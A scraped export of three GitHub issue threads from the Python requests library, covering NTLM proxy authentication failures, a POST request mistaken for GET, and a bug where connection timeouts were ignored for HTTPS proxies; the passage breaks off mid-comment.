requests.exceptions.ConnectionError: HTTPSConnectionPool(host='epfws.usps.gov', port=443): Max retries exceeded with url: /ws/resources/epf/version (Caused by P roxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 407 Pro xy Authentication Required',))) G:\Python34>
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2338/reactions" }
https://api.github.com/repos/psf/requests/issues/2338/timeline
null
completed
null
null
false
[ "The error here is extremely clear: _407 Proxy Authentication Required_.\n\nYou need to send some user credentials to the proxy. The real risk here is that the proxy is a Windows domain auth proxy, in which case this will be extremely difficult.\n", "Yep. Clear. But here is the deal. I do NOT have to send in any credentials when using via my internet browser. I will try with user and password and see what it does...I really don't want to have to do that though. \n", "I'm not surprised. That's because you'll be doing some form of domain auth: maybe NTLM, maybe Kerberos. Either way it is extremely difficult to authenticate with a proxy that requires this kind of auth from Python, and to my knowledge there is no project that does so with requests.\n", "So would trying with user:password actually work? If so what user/password would it need. Using my credentials does not work.\n", "Let's be clear about what you're authenticating to.\n\nIf you pass `auth=(user,pass)` that will not work. That attempts to authenticate with the remote server, not the proxy. You'd need to set a Proxy-Authorization header. You can try doing that by setting your proxy URL to `http://user:pass@proxy_ip/`. That _might_ work.\n", "Yep..That is what I just tried. See below. Didn't work if I set it up right. Still get 407 error.\n\nimport requests\nproxies = {\n \"http\": \"'dmorri':'@XYZ@12345'@proxy.shareddev.acxiom.net:8080\",\n \"https\": \"'dmorri':'@XYZ@12345'@proxy.shareddev.acxiom.net:8080\",\n}\nr = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=proxies)\nprint(r.text)\n", "Uh...why are there quotes in your username and password?\n", "Well my password has @ symbols. :-) So figured I had to put single quotes around it. I can try without. :-)\n", "I think you'll have to try without, but it does raise the question about how well the parsing is going to work here. I wonder what we did last time.\n", "So here is what I get without.\n\n\\urllib3\\poolmanager.py\", line 265, in proxy_from_ur\n return ProxyManager(proxy_url=url, **kw)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3\n\\urllib3\\poolmanager.py\", line 216, in **init**\n 'Not supported proxy scheme %s' % proxy.scheme\nAssertionError: Not supported proxy scheme dmorri\n", "You left the scheme off the proxy URL. Must begin http://\n", "Same error:\n\nimport requests\nproxies = {\n \"http\": \"dmorri:@XYZ@12345@http://proxy.shareddev.acxiom.net:8080\",\n \"https\": \"dmorri:@XYZ@12345@http://proxy.shareddev.acxiom.net:8080\",\n}\nr = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=proxies)\nprint(r.text)\n", "Error again is: \n\nG:\\Python34>python uspsver.py\nTraceback (most recent call last):\n File \"uspsver.py\", line 6, in <module>\n r = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=\nproxies)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\api.py\",\n line 65, in get\n return request('get', url, *_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\api.py\",\n line 49, in request\n response = session.request(method=method, url=url, *_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\sessions\n.py\", line 459, in request\n resp = self.send(prep, *_send_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\sessions\n.py\", line 571, in send\n r = adapter.send(request, *_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\adapters\n.py\", line 331, in send\n conn = self.get_connection(request.url, proxies)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\adapters\n.py\", line 239, in get_connection\n proxy_manager = self.proxy_manager_for(proxy)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\adapters\n.py\", line 149, in proxy_manager_for\n *_proxy_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\packages\n\\urllib3\\poolmanager.py\", line 265, in proxy_from_url\n return ProxyManager(proxy_url=url, *_kw)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\packages\n\\urllib3\\poolmanager.py\", line 216, in **init**\n 'Not supported proxy scheme %s' % proxy.scheme\nAssertionError: Not supported proxy scheme dmorri\n\nG:\\Python34>\n", "Heh, let's be really clear and reprint what I said above:\n\n```\nhttp://user:pass@proxy_ip/\n```\n\nThe scheme must come before the username and password.\n", "Oops. My bad.\n", "Now I get the 407 error again. \n", "import requests\nproxies = {\n \"http\": \"http://dmorri:@XYZ@[email protected]:8080\",\n \"https\": \"http://dmorri:@XYZ@[email protected]:8080\",\n}\nr = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=proxies)\nprint(r.text)\n", "Yup, so that suggests that the procedure doesn't work.\n\nThis almost certainly uses NTLM or Kerberos to authenticate. Quick question, does it happen with HTTP as well as HTTPS?\n", "are you prepending an @ to your password?\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Thu, Nov 13, 2014 at 9:52 AM, dmorri [email protected] wrote:\n\n> import requests\n> proxies = {\n> \"http\": \"http://dmorri:@XYZ https://github.com/XYZ@\n> [email protected]:8080\",\n> \"https\": \"http://dmorri:@XYZ https://github.com/XYZ@\n> [email protected]:8080\",\n> }\n> r = requests.get('https://epfws.usps.gov/ws/resources/epf/version',\n> proxies=proxies)\n> print(r.text)\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2338#issuecomment-62935509\n> .\n", "Not sure...Do you have a HTTP get call I can try?\n", "Try calling `http://httpbin.org/get`.\n", "Here is what I get on the httpbin.org.\n\nG:\\Python34>python uspsver.py\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n<title>Notification: Proxy Authorization Required</title>\n\n<style type=\"text/css\">\n<!--\nbody {\n margin-left: 2%;\n margin-right: 2%;\n}\np {\n font-family: verdana, Arial, Helvetica, sans-serif;\n font-size: 12px;\n top: 0px;\n margin-top: 6px;\n margin-bottom: 6px;\n}\ntd {\n font-family: verdana, Arial, Helvetica, sans-serif;\n font-size: 12px;\n top: 0px;\n}\n.code {\n font-family: courier;\n font-size: 12px;\n top: 0px;\n}\nh1 {\n font-family: verdana, Arial, Helvetica, sans-serif;\n font-size: 16px;\n margin-top: 24px;\n margin-bottom: 8px;\n}\nhr {\n margin-top: 2px;\n margin-bottom: 2px;\n}\n-->\n</style>\n\n</head>\n\n<body>\n<img src=\"http://acxpac01.corp.acxiom.net/error/ACXM.gif\" border=\"0\">\n\n<h1>This Page Cannot Be Displayed</h1>\n\n<hr>\n\n<p>\nAuthentication is required to access the Internet using this system.\nA valid user ID and password must be entered when prompted.\n</p>\n\n<p>If you feel you have reached this page in error and want to have the site rev\niewed, please open a LevelZero request ticket at the <a href=\"http://levelzero/l\nevelzero/\">LevelZero Site</a> for the ESOC team. <b>* Message reported from cwy\nipwsa1 *</b></p>\n<p>\nIf you have questions, need assistance with your login\ninformation, or feel this is an error, please contact\nESOC via a LevelZero ticket\nand provide the codes shown below.\n</p>\n\n<hr>\n\n<table>\n <tr valign=\"top\">\n <td valign=\"top\" width=\"10%\">Notification&nbsp;codes:&nbsp;</td>\n <td valign=\"top\" class=\"code\" width=\"90%\">(1, PROXY_AUTH_REQUIRED)</td>\n </tr>\n</table>\n\n</body>\n</html>\n\nG:\\Python34>\n", "Right, that's what I expected. Do you know how to use tcpdump or wireshark?\n", "So slightly different, but same type of issue. \n\nKevin..What do you mean by pre-appending? The password has two @ symbols. as shown...I just changed to XYZ since I didn't want to post my actual pasword. But the layout is still the same. \n@xxx@11111\n", "I did some dumps with wireshark long ago!!! \n", "Oh, wait, we don't need it.\n\nDon't print the response, print the response headers for me please.\n", "okay..Hold on.\n", "Sup! You rang?\n", "With the http call I can print it (With https with 407 I cannot). \n\nG:\\Python34>python uspsver.py\n{'Content-Length': '1753', 'Proxy-Authenticate': 'NTLM', 'Connection': 'close',\n'Content-Type': 'text/html', 'Proxy-Connection': 'close', 'Mime-Version': '1.0',\n 'Date': 'Thu, 13 Nov 2014 12:09:08 CST'}\n", "@xxx Oh, that's gotta be the most annoying handle on GitHub. Sorry you got accidentally summoned!\n" ]
https://api.github.com/repos/psf/requests/issues/2337
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2337/labels{/name}
https://api.github.com/repos/psf/requests/issues/2337/comments
https://api.github.com/repos/psf/requests/issues/2337/events
https://github.com/psf/requests/issues/2337
48,650,926
MDU6SXNzdWU0ODY1MDkyNg==
2,337
[MISTAKE] POST requests are executed like GET
{ "avatar_url": "https://avatars.githubusercontent.com/u/10137?v=4", "events_url": "https://api.github.com/users/ghost/events{/privacy}", "followers_url": "https://api.github.com/users/ghost/followers", "following_url": "https://api.github.com/users/ghost/following{/other_user}", "gists_url": "https://api.github.com/users/ghost/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ghost", "id": 10137, "login": "ghost", "node_id": "MDQ6VXNlcjEwMTM3", "organizations_url": "https://api.github.com/users/ghost/orgs", "received_events_url": "https://api.github.com/users/ghost/received_events", "repos_url": "https://api.github.com/users/ghost/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ghost/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ghost/subscriptions", "type": "User", "url": "https://api.github.com/users/ghost", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-11-13T15:44:01Z
2021-09-08T23:06:52Z
2014-11-13T18:51:18Z
NONE
resolved
Hi, Seems like always POST requests are executed as GET. All examples that I found seems to match my way of using `requests.post()`, but still no POST request is executed. My `requests` version is '2.2.1', my python version is `2.7.6` Here is code snippet: ----------------------- Python code start ---------------------------- import requests import json url = 'http://api.website.com' auth = ('user', 'pass') headers = {'Content-Type' : 'application/json'} proxies = {"http" : "http://address:port", "https" : "http:/address:port"} data = json.dumps({'1' : 2, 'a' : 'b'}) response = requests.post(url=url, data=data, headers=headers, auth=auth, proxies=proxies) print response.headers print response.text ----------------------- Python code end ---------------------------- I hope it is not implementation issue. Thanks
null
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2337/reactions" }
https://api.github.com/repos/psf/requests/issues/2337/timeline
null
completed
null
null
false
[ "What does 'executed as a GET' mean?\n\nA POST request is signaled by sending a request line that looks like this:\n\n```\nPOST / HTTP/1.1\n```\n\nWe're definitely doing that correctly. You're going to have to be more specific about what you think is wrong.\n", "I suspect you're being redirected. Try passing `allow_redirects=False` and see what the resonse is that you get. That said, my suspicion is rooted in nothing other than the expected behaviour of clients following the HTTP RFCs. We need a lot more information about what `response.history` looks like and what server you're talking to.\n", "This has nothing to do with requests and everything to do with your PHP. See [this Stack Overflow question](https://stackoverflow.com/questions/18866571/receive-json-post-with-php).\n", "That's not a problem, I'm glad we could help. =)\n" ]
https://api.github.com/repos/psf/requests/issues/2336
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2336/labels{/name}
https://api.github.com/repos/psf/requests/issues/2336/comments
https://api.github.com/repos/psf/requests/issues/2336/events
https://github.com/psf/requests/issues/2336
48,629,128
MDU6SXNzdWU0ODYyOTEyOA==
2,336
Timeout for connecting to proxy
{ "avatar_url": "https://avatars.githubusercontent.com/u/716339?v=4", "events_url": "https://api.github.com/users/glaslos/events{/privacy}", "followers_url": "https://api.github.com/users/glaslos/followers", "following_url": "https://api.github.com/users/glaslos/following{/other_user}", "gists_url": "https://api.github.com/users/glaslos/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/glaslos", "id": 716339, "login": "glaslos", "node_id": "MDQ6VXNlcjcxNjMzOQ==", "organizations_url": "https://api.github.com/users/glaslos/orgs", "received_events_url": "https://api.github.com/users/glaslos/received_events", "repos_url": "https://api.github.com/users/glaslos/repos", "site_admin": false, "starred_url": "https://api.github.com/users/glaslos/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/glaslos/subscriptions", "type": "User", "url": "https://api.github.com/users/glaslos", "user_view_type": "public" }
[ { "color": "e10c02", "default": false, "description": null, "id": 117744, "name": "Bug", "node_id": "MDU6TGFiZWwxMTc3NDQ=", "url": "https://api.github.com/repos/psf/requests/labels/Bug" } ]
closed
true
null
[]
null
38
2014-11-13T12:10:06Z
2021-09-08T17:05:23Z
2015-03-02T09:49:24Z
NONE
resolved
I provided a bogus proxy, set a very short timeout and expected requests to fail very fast. Unfortunately the opposite happened. Is this behavior intentional? As far as I can tell there is no way to set a timeout for the proxy connection. ``` Python time python -c "import requests; print requests.__version__; requests.get('https://google.com', timeout=0.01, proxies={'https':'https://1.1.1.1'})" 2.4.3 Traceback (most recent call last): File "<string>", line 1, in <module> File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 60, in get return request('get', url, **kwargs) File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 49, in request return session.request(method=method, url=url, **kwargs) File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 457, in request resp = self.send(prep, **send_kwargs) File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 569, in send r = adapter.send(request, **kwargs) File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 413, in send raise ConnectionError(e, request=request) requests.exceptions.ConnectionError: HTTPSConnectionPool(host='google.com', port=443): Max retries exceeded with url: / (Caused by ProxyError('Cannot connect to proxy.', error(110, 'Connection timed out'))) real 2m7.350s user 0m0.090s sys 0m0.030s ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/716339?v=4", "events_url": "https://api.github.com/users/glaslos/events{/privacy}", "followers_url": "https://api.github.com/users/glaslos/followers", "following_url": "https://api.github.com/users/glaslos/following{/other_user}", "gists_url": "https://api.github.com/users/glaslos/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/glaslos", "id": 716339, "login": "glaslos", "node_id": "MDQ6VXNlcjcxNjMzOQ==", "organizations_url": "https://api.github.com/users/glaslos/orgs", "received_events_url": "https://api.github.com/users/glaslos/received_events", "repos_url": "https://api.github.com/users/glaslos/repos", "site_admin": false, "starred_url": "https://api.github.com/users/glaslos/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/glaslos/subscriptions", "type": "User", "url": "https://api.github.com/users/glaslos", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2336/reactions" }
https://api.github.com/repos/psf/requests/issues/2336/timeline
null
completed
null
null
false
[ "That's an interesting question. @kevinburke, got any idea?\n", "A guess without looking at anything is that the ProxyManager doesn't apply the timeout to connections to the proxy.\n", "Will take a look when I get an computer\n\nOn Thursday, November 13, 2014, Ian Cordasco [email protected]\nwrote:\n\n> A guess without looking at anything is that the ProxyManager doesn't apply\n> the timeout to connections to the proxy.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2336#issuecomment-62920205\n> .\n\n## \n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n", "Hmmm seems to time out right away if you make the request over HTTP. here is my investigation so far.\n\nhttps://gist.github.com/kevinburke/e862b5d6a56a6d99de9d\n\nAbout to start reading code.\n", "So... this is an error. \n\nThe gist of it is, with HTTPS connections connect() gets called earlier in the urlopen() process than with a HTTP connection. Specifically, for HTTPS _new_conn will call _prepare_conn, which calls connect() on the socket, where for HTTP, the connect() call is delayed all the way until httplib.request.\n\nurllib3 sets the connection timeout until after calling _get_conn, but before httplib.request, which explains why the timeout isn't set.\n\nThe obvious question is why isn't this an issue when you're not using a proxy? Well, prepare_conn only attempts the connect() if you're using a proxy, with the following note:\n\n```\n # Establish tunnel connection early, because otherwise httplib\n # would improperly set Host: header to proxy's IP:port.\n conn.connect()\n```\n\nI'll discuss with @shazow and see if we can figure out a good course of action.\n", "Added https://github.com/shazow/urllib3/issues/504. Maybe just leave this open until we come to a resolution over there\n", "I also encoutered a deadlock problem caused by this similar timeout issue.\n\nWhat I did is sending a GET request to some site (like http://jsonip.com) using an HTTP proxy to get proxy's public ip address, the code is like:\n\n```\ns = requests.Session()\ns.proxies = {'http': 'http://xx.xx.xx.xx:xxx', 'https': 'http://xx.xx.xx.xx:xxx'}\nr = s.get('http://jsonip.com', timeout=5)\nr.raise_for_status()\n...\n```\n\nAfter deadlock, the stack trace of the problmatic thread is (other threads are waiting for its completion):\n\n```\nFile: \"C:\\Python27\\lib\\threading.py\", line 783, in __bootstrap\n self.__bootstrap_inner()\nFile: \"C:\\Python27\\lib\\threading.py\", line 810, in __bootstrap_inner\n self.run()\nFile: \"C:\\Python27\\lib\\threading.py\", line 763, in run\n self.__target(*self.__args, **self.__kwargs)\nFile: \"C:\\Python27\\lib\\site-packages\\concurrent\\futures\\thread.py\", line 73, in _worker\n work_item.run()\nFile: \"C:\\Python27\\lib\\site-packages\\concurrent\\futures\\thread.py\", line 61, in run\n result = self.fn(*self.args, **self.kwargs)\nFile: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\app\\proxy_filter.py\", line 45, in test\n ip = self.public_ip.get(host)\nFile: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\utils.py\", line 91, in get\n ip = func(session, timeout)\nFile: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\get_ip.py\", line 43, in get_ip_4\n r = session.get('http://jsonip.com', timeout=timeout)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 473, in get\n return self.request('GET', url, **kwargs)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 599, in send\n history = [resp for resp in gen] if allow_redirects else []\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 192, in resolve_redirects\n allow_redirects=False,\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\adapters.py\", line 370, in send\n timeout=timeout\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 513, in urlopen\n conn = self._get_conn(timeout=pool_timeout)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 231, in _get_conn\n return conn or self._new_conn()\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 717, in _new_conn\n return self._prepare_conn(conn)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 690, in _prepare_conn\n conn.connect()\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connection.py\", line 217, in connect\n self._tunnel()\nFile: \"C:\\Python27\\lib\\httplib.py\", line 752, in _tunnel\n (version, code, message) = response._read_status()\nFile: \"C:\\Python27\\lib\\httplib.py\", line 365, in _read_status\n line = self.fp.readline(_MAXLINE + 1)\nFile: \"C:\\Python27\\lib\\socket.py\", line 476, in readline\n data = self._sock.recv(self._rbufsize)\n```\n\nI think it's the same bug discussed in this issue, right? The version of Requests is 2.5.0.\n", "We haven't shipped the fix for this yet. Ping @shazow and @sigmavirus24\n\nOn Wednesday, December 3, 2014, Zhang Yibin [email protected]\nwrote:\n\n> I also encoutered a deadlock problem caused by this similar timeout issue.\n> \n> What I did is sending a GET request to some site (like http://jsonip.com)\n> using an HTTP proxy to get proxy's public ip address, the code is like:\n> \n> s = requests.Session()\n> s.proxies = {'http': 'http://xx.xx.xx.xx:xxx', 'https': 'http://xx.xx.xx.xx:xxx'}\n> r = s.get('http://jsonip.com', timeout=5)\n> r.raise_for_status()\n> ...\n> \n> After deadlock, the stack trace of the problmatic thread is (other threads\n> are waiting for its completion):\n> \n> File: \"C:\\Python27\\lib\\threading.py\", line 783, in __bootstrap\n> self.__bootstrap_inner()\n> File: \"C:\\Python27\\lib\\threading.py\", line 810, in __bootstrap_inner\n> self.run()\n> File: \"C:\\Python27\\lib\\threading.py\", line 763, in run\n> self.__target(_self.__args, *_self.__kwargs)\n> File: \"C:\\Python27\\lib\\site-packages\\concurrent\\futures\\thread.py\", line 73, in _worker\n> work_item.run()\n> File: \"C:\\Python27\\lib\\site-packages\\concurrent\\futures\\thread.py\", line 61, in run\n> result = self.fn(_self.args, *_self.kwargs)\n> File: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\app\\proxy_filter.py\", line 45, in test\n> ip = self.public_ip.get(host)\n> File: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\utils.py\", line 91, in get\n> ip = func(session, timeout)\n> File: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\get_ip.py\", line 43, in get_ip_4\n> r = session.get('http://jsonip.com', timeout=timeout)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 473, in get\n> return self.request('GET', url, *_kwargs)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 461, in request\n> resp = self.send(prep, *_send_kwargs)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 599, in send\n> history = [resp for resp in gen] if allow_redirects else []\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 192, in resolve_redirects\n> allow_redirects=False,\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 573, in send\n> r = adapter.send(request, **kwargs)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\adapters.py\", line 370, in send\n> timeout=timeout\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 513, in urlopen\n> conn = self._get_conn(timeout=pool_timeout)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 231, in _get_conn\n> return conn or self._new_conn()\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 717, in _new_conn\n> return self._prepare_conn(conn)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 690, in _prepare_conn\n> conn.connect()\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connection.py\", line 217, in connect\n> self._tunnel()\n> File: \"C:\\Python27\\lib\\httplib.py\", line 752, in _tunnel\n> (version, code, message) = response._read_status()\n> File: \"C:\\Python27\\lib\\httplib.py\", line 365, in _read_status\n> line = self.fp.readline(_MAXLINE + 1)\n> File: \"C:\\Python27\\lib\\socket.py\", line 476, in readline\n> data = self._sock.recv(self._rbufsize)\n> \n> I think it's the same bug discussed in this issue, right? The version of\n> Requests is 2.5.0.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2336#issuecomment-65412519\n> .\n\n## \n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n", "In my case, I didn't use proxy to visit any HTTPS site. Does it fix my problem?\n\nUPDATE: Now I have to use \"socket.setdefaulttimeout(30.0)\" everytime I use requests to access proxy, sigh...\n", "The urllib3 fix was merged before the v2.5.1 release.\n\nWith HTTPS proxy:\n\n```\ntime ./bin/python -c \"import requests; print requests.__version__; requests.get('https://google.com', timeout=0.01, proxies={'https':'https://1.1.1.1'})\"\n2.5.1\n```\n\n```\nTraceback (most recent call last):\n File \"app_main.py\", line 72, in run_toplevel\n File \"app_main.py\", line 562, in run_it\n File \"<string>\", line 1, in <module>\n File \"/tmp/req/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/tmp/req/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/tmp/req/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/tmp/req/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/tmp/req/site-packages/requests/adapters.py\", line 424, in send\n raise ConnectionError(e, request=request)\nConnectionError: HTTPSConnectionPool(host='google.com', port=443): Max retries exceeded with url: / (Caused by ProxyError('Cannot connect to proxy.', error(110, 'Connection timed out')))\n```\n\n```\nreal 2m7.502s\nuser 0m0.192s\nsys 0m0.025s\n```\n\nAnd with the HTTP proxy:\n\n```\ntime ./bin/python -c \"import requests; print requests.__version__; requests.get('https://google.com', timeout=0.01, proxies={'http':'http://1.1.1.1'})\"\n2.5.1\n```\n\n```\nTraceback (most recent call last):\n File \"app_main.py\", line 72, in run_toplevel\n File \"app_main.py\", line 562, in run_it\n File \"<string>\", line 1, in <module>\n File \"/tmp/req/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/tmp/req/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/tmp/req/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/tmp/req/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/tmp/req/site-packages/requests/adapters.py\", line 433, in send\n raise ReadTimeout(e, request=request)\nReadTimeout: HTTPSConnectionPool(host='google.com', port=443): Read timed out. (read timeout=0.01)\n```\n\n```\nreal 0m0.281s\nuser 0m0.201s\nsys 0m0.024s\n```\n", "Thanks for your work all!\n", "Erm, IMHO the problem is not fixed :)\n", "In what sense?\n", "The request with HTTPS proxy is still not timing out as set by the parameter.\n", "Apologies, I don't know how I missed that. You're quite right.\n", "I think we need to pull urllib3 in before the next release to fix this. 2.5.1 was released mostly with the intention of fixing a bug with HTTPDigestAuth. @glaslos if we pull in a more modern copy of urllib3, can you test master for us to see if it fixes the problem? If it does I'm comfortable cutting 2.5.2\n", "Sounds good to me.\n", "Master has an up-to-date copy of urllib3 @glaslos. Test away\n", "@kevinburke could you confirm that your changes to urllib3 are in the requests master branch?\n", "urllib3 is still ignoring the timeout parameter if you use an HTTPS proxy:\n\n```\n(req)lrist@laptop-lrist /tmp/req $ cd requests/ && git rev-parse --short HEAD && cd ..\n673bd6a\n```\n\n```\n(req)lrist@laptop-lrist /tmp/req $ time ./bin/python -c \"import requests; print requests.__version__; print requests.__file__; requests.get('https://google.com', timeout=0.01, proxies={'https':'https://1.1.1.1'})\"\n2.5.1\n/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/__init__.py\n```\n\nIt takes more than 2 seconds to timeout with `timeout=0.01`\n\n``` python\nTraceback (most recent call last):\n File \"app_main.py\", line 72, in run_toplevel\n File \"app_main.py\", line 562, in run_it\n File \"<string>\", line 1, in <module>\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/adapters.py\", line 424, in send\n raise ConnectionError(e, request=request)\nConnectionError: HTTPSConnectionPool(host='google.com', port=443): Max retries exceeded with url: / (Caused by ProxyError('Cannot connect to proxy.', error(110, 'Connection timed out')))\n```\n\nTimings:\n\n```\nreal 2m7.452s\nuser 0m0.194s\nsys 0m0.024s\n```\n", "Any progress on this issue?\n", "FYI, requests doesn't support connections to HTTPS proxies. See https://github.com/kennethreitz/requests/issues/1622 and https://github.com/kennethreitz/requests/issues/2386\n", "Ah I see. Still, urllib3 is not handling the timeout parameter.\n", "> Ah I see. Still, urllib3 is not handling the timeout parameter.\n\nThis works for me on master, should be fixed with https://github.com/kennethreitz/requests/commit/d2d576b6b1101e2871c82f63adf2c2b534c2dabc\n", "I confirmed this is fixed in master. Thanks!\n", "not work with requests 2.10.0,\n\na fake proxies, this work fine.after 0.1s timeout.\n\n```\nrequests.get(\"http://baidu.com\",timeout=0.1,proxies={'http':'http://120.0.0.1:80'})\n```\n\nthis code with https proxies , get no response, just hang 